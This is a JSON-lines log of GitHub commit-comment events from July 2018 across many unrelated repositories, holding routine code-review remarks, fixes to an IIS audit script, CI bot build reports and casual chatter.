{"id":"8001483997","type":"CommitCommentEvent","actor":{"login":"benjfitz"},"repo":{"name":"benjfitz/rmsd-1"},"payload":{"comment":{"id":29795387,"position":null,"line":null,"path":null,"commit_id":"84a813964a1b10278c2afd7f49983d80c9009b31","created_at":"2018-07-23T03:20:57Z","updated_at":"2018-07-23T03:20:57Z","author_association":"OWNER","body":"\r\n[c6h7-int1-a.txt](https://github.com/benjfitz/rmsd-1/files/2217829/c6h7-int1-a.txt)\r\n[c6h7-int1-b.txt](https://github.com/benjfitz/rmsd-1/files/2217830/c6h7-int1-b.txt)\r\n[c6h7-int1-c.txt](https://github.com/benjfitz/rmsd-1/files/2217831/c6h7-int1-c.txt)\r\n[c6h7-int1-t.txt](https://github.com/benjfitz/rmsd-1/files/2217832/c6h7-int1-t.txt)\r\n[c6h7-int2-t-b.txt](https://github.com/benjfitz/rmsd-1/files/2217833/c6h7-int2-t-b.txt)\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-23T03:20:57Z"}
{"id":"8001485357","type":"CommitCommentEvent","actor":{"login":"benjfitz"},"repo":{"name":"benjfitz/rmsd-1"},"payload":{"comment":{"id":29795390,"position":null,"line":null,"path":null,"commit_id":"84a813964a1b10278c2afd7f49983d80c9009b31","created_at":"2018-07-23T03:21:32Z","updated_at":"2018-07-23T03:21:32Z","author_association":"OWNER","body":"The int1 files have identical atom ordering, but have been rotated. \r\n\r\nThe int2 files have altered atom ordering."}},"created_at":"2018-07-23T03:21:32Z"}
{"id":"8001505018","type":"CommitCommentEvent","actor":{"login":"ChanwooKim00"},"repo":{"name":"ChanwooKim00/atom"},"payload":{"comment":{"id":29795431,"position":null,"line":null,"path":null,"commit_id":"e8271292cab206fdbd7d4c513257c4bf6d5e4680","created_at":"2018-07-23T03:30:20Z","updated_at":"2018-07-23T03:30:20Z","author_association":"OWNER","body":"코딩 별로 못하시네요"}},"created_at":"2018-07-23T03:30:20Z"}
{"id":"8001505152","type":"CommitCommentEvent","actor":{"login":"subhasoumya"},"repo":{"name":"subhasoumya/subhasoumya.github.io"},"payload":{"comment":{"id":29795432,"position":null,"line":null,"path":null,"commit_id":"b256930382431937cd754ff837426aa860defb8a","created_at":"2018-07-23T03:30:24Z","updated_at":"2018-07-23T03:30:24Z","author_association":"OWNER","body":"[one-page-resume-template-v.1.zip](https://github.com/subhasoumya/subhasoumya.github.io/files/2217843/one-page-resume-template-v.1.zip)\r\n"}},"created_at":"2018-07-23T03:30:24Z"}
{"id":"8001505440","type":"CommitCommentEvent","actor":{"login":"PhiBabin"},"repo":{"name":"RoboCupULaval/StrategyAI"},"payload":{"comment":{"id":29795433,"position":95,"line":191,"path":"ai/STA/Tactic/goalkeeper.py","commit_id":"95216cd04d33cb1a2bffdcfde2232a0982ce4f5e","created_at":"2018-07-23T03:30:31Z","updated_at":"2018-07-23T03:30:31Z","author_association":"CONTRIBUTOR","body":"Probablement que l'argument est ignoré par l'UI, il faudrait rajouté une issue"}},"created_at":"2018-07-23T03:30:31Z"}
{"id":"8001505577","type":"CommitCommentEvent","actor":{"login":"ChanwooKim00"},"repo":{"name":"ChanwooKim00/atom"},"payload":{"comment":{"id":29795434,"position":null,"line":null,"path":null,"commit_id":"e8271292cab206fdbd7d4c513257c4bf6d5e4680","created_at":"2018-07-23T03:30:35Z","updated_at":"2018-07-23T03:30:35Z","author_association":"OWNER","body":"연습좀;;\r\n"}},"created_at":"2018-07-23T03:30:35Z"}
{"id":"8001506889","type":"CommitCommentEvent","actor":{"login":"hooonz"},"repo":{"name":"ChanwooKim00/atom"},"payload":{"comment":{"id":29795435,"position":null,"line":null,"path":null,"commit_id":"e8271292cab206fdbd7d4c513257c4bf6d5e4680","created_at":"2018-07-23T03:31:08Z","updated_at":"2018-07-23T03:31:08Z","author_association":"COLLABORATOR","body":"엘레베이터 아까 왜닫으셨나요 "}},"created_at":"2018-07-23T03:31:08Z"}
{"id":"8001508374","type":"CommitCommentEvent","actor":{"login":"aliciapflaumer"},"repo":{"name":"aliciapflaumer/got-reads-front-end"},"payload":{"comment":{"id":29795437,"position":null,"line":null,"path":null,"commit_id":"7340c0494d8841407d1729c9584c42b42861e2ca","created_at":"2018-07-23T03:31:50Z","updated_at":"2018-07-23T03:31:50Z","author_association":"OWNER","body":"Used \r\n`npm i hoek  \r\nnpm uninstall hoek \r\nnpm update \r\nnpm install'"}},"created_at":"2018-07-23T03:31:50Z"}
{"id":"8001512759","type":"CommitCommentEvent","actor":{"login":"yjc567"},"repo":{"name":"SamueqlQian/StyleBank.Pytorch"},"payload":{"comment":{"id":29795444,"position":null,"line":null,"path":null,"commit_id":"631f1d4a7f19dedf4efe072b2003a890e0658771","created_at":"2018-07-23T03:33:44Z","updated_at":"2018-07-23T03:33:44Z","author_association":"CONTRIBUTOR","body":"the [definition of gram matrix](https://en.wikipedia.org/wiki/Gramian_matrix) do not divided by (ch * h * w), but if you don't divided by (ch * h * w), the mse loss calculated by gram matrix will affected by input's size.\r\nthe reason I moved (ch * h * w) here is in the experiment, we can't get satisfactory results unless we set $/alpha / /beta == 10000$, but if we moved (ch * h * w) in gram matrix, the results would be nice under $/alpha / /beta == 100$. Since the original definition of gram matrix and the experiment result, I moved (ch * h * w) anyway."}},"created_at":"2018-07-23T03:33:44Z"}
{"id":"8001516590","type":"CommitCommentEvent","actor":{"login":"choalover"},"repo":{"name":"choalover/EmpiralMP"},"payload":{"comment":{"id":29795448,"position":null,"line":null,"path":null,"commit_id":"a03820834521e5920703b9241c1f03178f92fd23","created_at":"2018-07-23T03:35:24Z","updated_at":"2018-07-23T03:35:24Z","author_association":"OWNER","body":"It is testing time, and hopefully, it goes very well."}},"created_at":"2018-07-23T03:35:24Z"}
{"id":"8001517722","type":"CommitCommentEvent","actor":{"login":"BbakeWalker"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29795450,"position":49,"line":90,"path":"app/src/main/java/com/example/android/quakereport/EarthquakeActivity.java","commit_id":"78e07dce2ab5ed3a7df2b254b853a7cc7ad0b0e8","created_at":"2018-07-23T03:35:53Z","updated_at":"2018-07-23T03:35:53Z","author_association":"NONE","body":"Both are same, you can use whichever you want."}},"created_at":"2018-07-23T03:35:53Z"}
{"id":"8001517850","type":"CommitCommentEvent","actor":{"login":"274188A"},"repo":{"name":"fbprogmbh/Audit-Test-Automation"},"payload":{"comment":{"id":29795451,"position":null,"line":null,"path":null,"commit_id":"e021a382674d9a1fca4b0610d0fb7463c9fe210a","created_at":"2018-07-23T03:35:57Z","updated_at":"2018-07-23T03:35:57Z","author_association":"NONE","body":"line 1251\r\n(#3.10) - used 'like' to cater for case insensitivity. correction to bracketing/for app-pool check\r\n\r\n  if (-not ($level -**like** \"medium\") \r\n                -or (-not ($appPoolVersion -like \"v2.*\")  -**and** (-not $appPoolVersion -like \"v4.*\")  ) \r\n                ) {\r\n            $message = \"TrustLevel set to $level\"\r\n            $audit = [AuditStatus]::False\r\n        }"}},"created_at":"2018-07-23T03:35:57Z"}
{"id":"8001521971","type":"CommitCommentEvent","actor":{"login":"BbakeWalker"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29795461,"position":82,"line":96,"path":"app/src/main/java/com/example/android/quakereport/EarthquakeActivity.java","commit_id":"78e07dce2ab5ed3a7df2b254b853a7cc7ad0b0e8","created_at":"2018-07-23T03:37:48Z","updated_at":"2018-07-23T03:37:48Z","author_association":"NONE","body":"Yeah, that is the problem. Thank you for the help"}},"created_at":"2018-07-23T03:37:48Z"}
{"id":"8001523459","type":"CommitCommentEvent","actor":{"login":"montoyah"},"repo":{"name":"montoyah/R-Fridays"},"payload":{"comment":{"id":29795463,"position":null,"line":null,"path":null,"commit_id":"8c095dcda01012bf0e03875dd912c477c028eb7b","created_at":"2018-07-23T03:38:28Z","updated_at":"2018-07-23T03:38:28Z","author_association":"OWNER","body":"."}},"created_at":"2018-07-23T03:38:28Z"}
{"id":"8001526902","type":"CommitCommentEvent","actor":{"login":"274188A"},"repo":{"name":"fbprogmbh/Audit-Test-Automation"},"payload":{"comment":{"id":29795465,"position":null,"line":null,"path":null,"commit_id":"e021a382674d9a1fca4b0610d0fb7463c9fe210a","created_at":"2018-07-23T03:40:05Z","updated_at":"2018-07-23T03:40:05Z","author_association":"NONE","body":"line 695\r\n(#2.6) correct logic\r\n\r\n   elseif ($httpsBindings.Count -**eq** 0) {\r\n\r\n\r\n         \r\n\r\n"}},"created_at":"2018-07-23T03:40:05Z"}
{"id":"8001532322","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29795469,"position":1,"line":null,"path":"1532317345.25/github_test.txt","commit_id":"6ec345c7a7be8448e11c9d2bc483a302e2463ba7","created_at":"2018-07-23T03:42:26Z","updated_at":"2018-07-23T03:42:26Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-23T03:42:26Z"}
{"id":"8001534319","type":"CommitCommentEvent","actor":{"login":"sim0504"},"repo":{"name":"RoboCupULaval/StrategyAI"},"payload":{"comment":{"id":29795472,"position":66,"line":87,"path":"ai/STA/Tactic/goalkeeper.py","commit_id":"95216cd04d33cb1a2bffdcfde2232a0982ce4f5e","created_at":"2018-07-23T03:43:21Z","updated_at":"2018-07-23T03:43:21Z","author_association":"MEMBER","body":"wrap_to_pi(angle+pi) fonctionne pas ?"}},"created_at":"2018-07-23T03:43:21Z"}
{"id":"8001535682","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29795477,"position":null,"line":null,"path":null,"commit_id":"7a9fa54f4b2097f573c11308c416f8a38f08f3ac","created_at":"2018-07-23T03:44:03Z","updated_at":"2018-07-23T03:44:03Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-fpg-filt](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-fpg-filt).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-fpg-filt-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-23T03:44:03Z"}
{"id":"8001536679","type":"CommitCommentEvent","actor":{"login":"gwalvanshi"},"repo":{"name":"gwalvanshi/BillingWebSite"},"payload":{"comment":{"id":29795479,"position":null,"line":null,"path":null,"commit_id":"a67eebfd532cc0b7dab9bc8276b4af66e9f5d218","created_at":"2018-07-23T03:44:29Z","updated_at":"2018-07-23T03:44:29Z","author_association":"OWNER","body":"sdsdfsdf"}},"created_at":"2018-07-23T03:44:29Z"}
{"id":"8001553947","type":"CommitCommentEvent","actor":{"login":"NTDJane"},"repo":{"name":"NTDJane/Quanlyvanthu"},"payload":{"comment":{"id":29795503,"position":null,"line":null,"path":null,"commit_id":"7e730d58d3d389bbe51ba950dd3a28868cb9d228","created_at":"2018-07-23T03:52:17Z","updated_at":"2018-07-23T03:52:17Z","author_association":"OWNER","body":"da thay doi"}},"created_at":"2018-07-23T03:52:17Z"}
{"id":"8001555426","type":"CommitCommentEvent","actor":{"login":"sundersb"},"repo":{"name":"mobius3/KiWi"},"payload":{"comment":{"id":29795504,"position":null,"line":null,"path":null,"commit_id":"52b4a23db72aae7891d7feb01c297a4074c88278","created_at":"2018-07-23T03:52:57Z","updated_at":"2018-07-23T03:52:57Z","author_association":"NONE","body":"This commit fixes the issue #30. Besides, I added option to select SDL development files' location on Windows systems.\r\n\r\nIt works for me and I'm sure it won't break anything"}},"created_at":"2018-07-23T03:52:57Z"}
{"id":"8001557290","type":"CommitCommentEvent","actor":{"login":"Tromador"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29795508,"position":null,"line":null,"path":null,"commit_id":"d4374c6d661488ccd155eb606177778901aab4bc","created_at":"2018-07-23T03:53:46Z","updated_at":"2018-07-23T03:53:46Z","author_association":"CONTRIBUTOR","body":"I actually did 5 seconds in the PR I sent, with a higher saving in CPU cycles, but this is fine too. "}},"created_at":"2018-07-23T03:53:46Z"}
{"id":"8001557295","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"react-component/table"},"payload":{"comment":{"id":29795509,"position":null,"line":null,"path":null,"commit_id":"6f4d0596a3e80e328d895815bf1994aa5d477759","created_at":"2018-07-23T03:53:46Z","updated_at":"2018-07-23T03:53:46Z","author_association":"MEMBER","body":"Close https://github.com/react-component/table/pull/221"}},"created_at":"2018-07-23T03:53:46Z"}
{"id":"8001560879","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29795514,"position":null,"line":null,"path":null,"commit_id":"a9b22ebd2cbcaf912d1e82d3430922fb954cacac","created_at":"2018-07-23T03:55:25Z","updated_at":"2018-07-23T03:55:25Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-23T03:55:25Z"}
{"id":"8001561006","type":"CommitCommentEvent","actor":{"login":"PaulStoffregen"},"repo":{"name":"PaulStoffregen/USBHost_t36"},"payload":{"comment":{"id":29795515,"position":null,"line":null,"path":null,"commit_id":"f890ec19553c40fec140ca0aea33448d3d89032d","created_at":"2018-07-23T03:55:29Z","updated_at":"2018-07-23T03:55:29Z","author_association":"OWNER","body":"I don't have that hardware and no plans to buy it for testing.  Maybe someone with the hardware could contribute the code?"}},"created_at":"2018-07-23T03:55:29Z"}
{"id":"8001565955","type":"CommitCommentEvent","actor":{"login":"SanjitKal"},"repo":{"name":"disco-lang/disco"},"payload":{"comment":{"id":29795518,"position":null,"line":null,"path":null,"commit_id":"7f3f192ea45b0dfb14e7e82c7142a05741f228ba","created_at":"2018-07-23T03:57:41Z","updated_at":"2018-07-23T03:57:41Z","author_association":"COLLABORATOR","body":"Not sure if there needs to be a separate file for type definitions, or if it should just be part of types.rst."}},"created_at":"2018-07-23T03:57:41Z"}
{"id":"8001565987","type":"CommitCommentEvent","actor":{"login":"choalover"},"repo":{"name":"choalover/EmpiralMP"},"payload":{"comment":{"id":29795519,"position":null,"line":null,"path":null,"commit_id":"ac8d05030da4aeeaf7b021a96e722819965b1ede","created_at":"2018-07-23T03:57:42Z","updated_at":"2018-07-23T03:57:42Z","author_association":"OWNER","body":"It is time to merge the dev branch into master to prepare for the release of EmpiralMP v1.1.0."}},"created_at":"2018-07-23T03:57:42Z"}
{"id":"8001576346","type":"CommitCommentEvent","actor":{"login":"Harshad2294"},"repo":{"name":"Harshad2294/PersonalityAnalyser"},"payload":{"comment":{"id":29795533,"position":null,"line":null,"path":null,"commit_id":"04a72c198a6d99d982f667b67db0b5c2d37d1ad3","created_at":"2018-07-23T04:02:10Z","updated_at":"2018-07-23T04:02:10Z","author_association":"OWNER","body":"Updated from 2 threads to 4 threads"}},"created_at":"2018-07-23T04:02:10Z"}
{"id":"8001579061","type":"CommitCommentEvent","actor":{"login":"franquitt"},"repo":{"name":"AragurDEV/yowsup"},"payload":{"comment":{"id":29795537,"position":null,"line":null,"path":null,"commit_id":"40dd8680bd3d0242da9691584c16e96a03dde9e0","created_at":"2018-07-23T04:03:17Z","updated_at":"2018-07-23T04:03:17Z","author_association":"NONE","body":"i love you and the community(and the god tgalal)"}},"created_at":"2018-07-23T04:03:17Z"}
{"id":"8001579633","type":"CommitCommentEvent","actor":{"login":"eyeonus"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29795539,"position":null,"line":null,"path":null,"commit_id":"d4374c6d661488ccd155eb606177778901aab4bc","created_at":"2018-07-23T04:03:34Z","updated_at":"2018-07-23T04:03:34Z","author_association":"OWNER","body":"Oh, you did send a PR. :)"}},"created_at":"2018-07-23T04:03:34Z"}
{"id":"8001579950","type":"CommitCommentEvent","actor":{"login":"LexManos"},"repo":{"name":"MinecraftForge/MCPConfig"},"payload":{"comment":{"id":29795540,"position":null,"line":null,"path":null,"commit_id":"ec8c25bc62e625062d5d76d8f2afcb16574d3833","created_at":"2018-07-23T04:03:43Z","updated_at":"2018-07-23T04:03:43Z","author_association":"MEMBER","body":"The heat has killed me today {got up to 98 where I work} so i'm gunna call it for the night.\r\nBut if anyone wants to port these patches over to server/joined.\r\n1.13:projectServerApplyPatches\r\n1.13:projectServerMakePatches\r\n1.13:projectJoinedApplyPatches\r\n1.13:projectMakeMakePatches\r\nIt'll setup a gradle project in /version/1.13/joined and /versions/1.13/server that you should be able to import into eclipse or intellij.\r\nCurrent trying to figure out how to make run configs from gradle, but until then you'll have to setup your own manually."}},"created_at":"2018-07-23T04:03:43Z"}
{"id":"8001582050","type":"CommitCommentEvent","actor":{"login":"274188A"},"repo":{"name":"fbprogmbh/Audit-Test-Automation"},"payload":{"comment":{"id":29795546,"position":null,"line":null,"path":null,"commit_id":"e021a382674d9a1fca4b0610d0fb7463c9fe210a","created_at":"2018-07-23T04:04:36Z","updated_at":"2018-07-23T04:04:36Z","author_association":"NONE","body":"line 242\r\n(#1.2) corrected where clause \r\n\r\n$Bindings = $Site.Bindings |  Where-Object { [string]::IsNullOrEmpty( **$_.Host**) }\r\n\r\n\r\n- examining $Bindings.Hosts does not work as a filter\r\n"}},"created_at":"2018-07-23T04:04:36Z"}
{"id":"8001587818","type":"CommitCommentEvent","actor":{"login":"Harshitha131997"},"repo":{"name":"Harshitha131997/153176_parallelproject_phase2"},"payload":{"comment":{"id":29795552,"position":1,"line":1,"path":"README.md","commit_id":"b11c00bfc1085d02536a4eae20ece871d2cd1881","created_at":"2018-07-23T04:07:14Z","updated_at":"2018-07-23T04:07:14Z","author_association":"OWNER","body":"Parallel project Payment Wallet app with jdbc is completed."}},"created_at":"2018-07-23T04:07:14Z"}
{"id":"8001590427","type":"CommitCommentEvent","actor":{"login":"eyeonus"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29795558,"position":null,"line":null,"path":null,"commit_id":"d4374c6d661488ccd155eb606177778901aab4bc","created_at":"2018-07-23T04:08:28Z","updated_at":"2018-07-23T04:08:28Z","author_association":"OWNER","body":"I went with 1 second because the config is in seconds, and \"1\" is the only number that any esoteric number of seconds divides evenly by.\r\n\r\nIt might not be a bad idea to have it sleep \"config['export_every_x_sec'] // 10\" seconds..... Hmmm...."}},"created_at":"2018-07-23T04:08:28Z"}
{"id":"8001592961","type":"CommitCommentEvent","actor":{"login":"ErichMoraga"},"repo":{"name":"ErichMoraga/openpilot"},"payload":{"comment":{"id":29795564,"position":null,"line":null,"path":null,"commit_id":"87ffa217144a7f5e90f236628beed09e18b85932","created_at":"2018-07-23T04:09:42Z","updated_at":"2018-07-23T04:09:42Z","author_association":"OWNER","body":"Effect seemed to be a delayed turn in, then subsequent over-reaction.  Straights were solid."}},"created_at":"2018-07-23T04:09:42Z"}
{"id":"8001595167","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29795566,"position":null,"line":null,"path":null,"commit_id":"d7413d4149a5778f958907ee4b4fa40d5bd7cea7","created_at":"2018-07-23T04:10:39Z","updated_at":"2018-07-23T04:10:39Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2324 of 2324 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7413d4149a5778f958907ee4b4fa40d5bd7cea7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7413d4149a5778f958907ee4b4fa40d5bd7cea7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7413d4149a5778f958907ee4b4fa40d5bd7cea7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-23T04:10:39Z"}
{"id":"8001596958","type":"CommitCommentEvent","actor":{"login":"DiR3Wolf"},"repo":{"name":"snoopyjoe/plugin.video.psvue"},"payload":{"comment":{"id":29795569,"position":null,"line":null,"path":null,"commit_id":"c914b2fc5b504881b87a8f0f7985eda4c7bc20ee","created_at":"2018-07-23T04:11:26Z","updated_at":"2018-07-23T04:11:26Z","author_association":"NONE","body":"@snoopyjoe Yes, I am watching this directly from the addon. I'm not sure if I understood correctly, but this is not a problem with the Kodi repo's version of PSVue, which is 2018.3.24; Only with the versions afterwards. So, is the mydvr code in version 2018.3.24 using a different way to pull the episode info? I'm not sure the issue is on Sony, is somewhere in the code between PsVue addon version 2018.3.24 and versions afterwards. The problem is consistent.  After 8+ hours, I can see the recording in newer psvue versions, so I suspect is has to do we changes to the UTC? maybe? The recoding does show as \"aired\"."}},"created_at":"2018-07-23T04:11:26Z"}
{"id":"8001598273","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29795572,"position":null,"line":null,"path":null,"commit_id":"d7413d4149a5778f958907ee4b4fa40d5bd7cea7","created_at":"2018-07-23T04:12:04Z","updated_at":"2018-07-23T04:12:04Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7413d4149a5778f958907ee4b4fa40d5bd7cea7-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-23T04:12:04Z"}
{"id":"8001599949","type":"CommitCommentEvent","actor":{"login":"ravb26"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29795577,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T04:12:54Z","updated_at":"2018-07-23T04:12:54Z","author_association":"NONE","body":"Nice project"}},"created_at":"2018-07-23T04:12:54Z"}
{"id":"8001603089","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29795578,"position":null,"line":null,"path":null,"commit_id":"cc9ff564c3dd8f1c7bd9317cd434f973aee54bfe","created_at":"2018-07-23T04:14:27Z","updated_at":"2018-07-23T04:14:27Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-256](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-256).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-256-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T04:14:27Z"}
{"id":"8001603987","type":"CommitCommentEvent","actor":{"login":"stanika"},"repo":{"name":"tschf/pldu"},"payload":{"comment":{"id":29795580,"position":null,"line":null,"path":null,"commit_id":"1428620d759c5fac374cb285b2c9b3290ca16e96","created_at":"2018-07-23T04:14:55Z","updated_at":"2018-07-23T04:14:55Z","author_association":"NONE","body":"oracle sql developer user account was expired how to connect my old account"}},"created_at":"2018-07-23T04:14:55Z"}
{"id":"8001606517","type":"CommitCommentEvent","actor":{"login":"sirsen0123"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29795588,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T04:16:07Z","updated_at":"2018-07-23T04:16:07Z","author_association":"NONE","body":"Great project"}},"created_at":"2018-07-23T04:16:07Z"}
{"id":"8001607239","type":"CommitCommentEvent","actor":{"login":"bippity"},"repo":{"name":"bippity/AutoBoss"},"payload":{"comment":{"id":29795589,"position":9,"line":11,"path":"AutoBoss/AutoBoss/AbsTools.cs","commit_id":"9dccea660bbcaa39f7541c12cf8d98b14212468d","created_at":"2018-07-23T04:16:27Z","updated_at":"2018-07-23T04:16:27Z","author_association":"OWNER","body":"Commented out because this variable wasn't used anywhere else but might be useful later on."}},"created_at":"2018-07-23T04:16:27Z"}
{"id":"8001608406","type":"CommitCommentEvent","actor":{"login":"Tromador"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29795590,"position":null,"line":null,"path":null,"commit_id":"d4374c6d661488ccd155eb606177778901aab4bc","created_at":"2018-07-23T04:16:58Z","updated_at":"2018-07-23T04:16:58Z","author_association":"CONTRIBUTOR","body":"Don't over think it. I figured 5 seconds nicely slowed it right down, but in such a way as to be essentially non impactful on any given export period. \r\n\r\nNot everything needs to be done down to the nth degree of justified perfection. \r\n\r\nIf you do change it, feel free to include attribution for me as having found & proposed solution in the patch notes :p"}},"created_at":"2018-07-23T04:16:58Z"}
{"id":"8001608573","type":"CommitCommentEvent","actor":{"login":"ronynn79"},"repo":{"name":"ronynn79/react-native"},"payload":{"comment":{"id":29795593,"position":null,"line":null,"path":null,"commit_id":"26684cf3adf4094eb6c405d345a75bf8c7c0bf88","created_at":"2018-07-23T04:17:02Z","updated_at":"2018-07-23T04:17:02Z","author_association":"OWNER","body":"No entiendo "}},"created_at":"2018-07-23T04:17:02Z"}
{"id":"8001617117","type":"CommitCommentEvent","actor":{"login":"eyeonus"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29795606,"position":null,"line":null,"path":null,"commit_id":"d4374c6d661488ccd155eb606177778901aab4bc","created_at":"2018-07-23T04:21:04Z","updated_at":"2018-07-23T04:21:04Z","author_association":"OWNER","body":"It doesn't seem any faster in my testing, so meh."}},"created_at":"2018-07-23T04:21:04Z"}
{"id":"8001639394","type":"CommitCommentEvent","actor":{"login":"Mark5897"},"repo":{"name":"Mark5897/Mark5897.github.io"},"payload":{"comment":{"id":29795649,"position":null,"line":null,"path":null,"commit_id":"937e88fc21277cbf0c9772930445fd8e2d981634","created_at":"2018-07-23T04:31:38Z","updated_at":"2018-07-23T04:31:38Z","author_association":"OWNER","body":"Web URL"}},"created_at":"2018-07-23T04:31:38Z"}
{"id":"8001641227","type":"CommitCommentEvent","actor":{"login":"mawww"},"repo":{"name":"mawww/kakoune"},"payload":{"comment":{"id":29795656,"position":59,"line":909,"path":"src/input_handler.cc","commit_id":"d23ac09fc18728ab0cbe7770543f71ee168346b0","created_at":"2018-07-23T04:32:30Z","updated_at":"2018-07-23T04:32:30Z","author_association":"OWNER","body":"Nope, push_mode will ultimately push the newly created mode onto the mode-stack, where it will be managed by a RefPtr, so it should not leak. This however is relatively bad api design from my part, we probably can make it more explicit that we expect a new object whose lifetime will be taken care of."}},"created_at":"2018-07-23T04:32:30Z"}
{"id":"8001641624","type":"CommitCommentEvent","actor":{"login":"fungilation"},"repo":{"name":"corbt/react-native-keep-awake"},"payload":{"comment":{"id":29795658,"position":12,"line":11,"path":"android/build.gradle","commit_id":"a65a3de1f2ecf33e18768dabc60acc01a562a9de","created_at":"2018-07-23T04:32:41Z","updated_at":"2018-07-23T04:32:41Z","author_association":"NONE","body":"This is too high? Even RN 0.56 is only using gradle:2.3.3"}},"created_at":"2018-07-23T04:32:41Z"}
{"id":"8001643111","type":"CommitCommentEvent","actor":{"login":"agera76"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29795660,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T04:33:24Z","updated_at":"2018-07-23T04:33:24Z","author_association":"NONE","body":"Nice project"}},"created_at":"2018-07-23T04:33:24Z"}
{"id":"8001643910","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29795663,"position":74,"line":1150,"path":"src/evdev-mt-touchpad.c","commit_id":"b556ded452d2ba8287d8848c7e454b5df2e12bb9","created_at":"2018-07-23T04:33:46Z","updated_at":"2018-07-23T04:33:46Z","author_association":"NONE","body":"shouldn't this be 15mm? I'm not quite sure where 25 comes from here."}},"created_at":"2018-07-23T04:33:46Z"}
{"id":"8001644084","type":"CommitCommentEvent","actor":{"login":"Tromador"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29795664,"position":null,"line":null,"path":null,"commit_id":"d4374c6d661488ccd155eb606177778901aab4bc","created_at":"2018-07-23T04:33:51Z","updated_at":"2018-07-23T04:33:51Z","author_association":"CONTRIBUTOR","body":"Nonsense. I had the idea hours ago whilst you were sleeping after spending like 5 hours of doing testing. Have you seen the amount of information I generated this evening? Would you even have been able to realise the fix without my test results? I think I deserve credit here. "}},"created_at":"2018-07-23T04:33:51Z"}
{"id":"8001646428","type":"CommitCommentEvent","actor":{"login":"274188A"},"repo":{"name":"fbprogmbh/Audit-Test-Automation"},"payload":{"comment":{"id":29795666,"position":null,"line":null,"path":null,"commit_id":"e021a382674d9a1fca4b0610d0fb7463c9fe210a","created_at":"2018-07-23T04:34:57Z","updated_at":"2018-07-23T04:34:57Z","author_association":"NONE","body":"line 1121\r\ntypo : should be $httpOnlyCookies\r\nif (-not $httpOnlyCookie**s**) {"}},"created_at":"2018-07-23T04:34:57Z"}
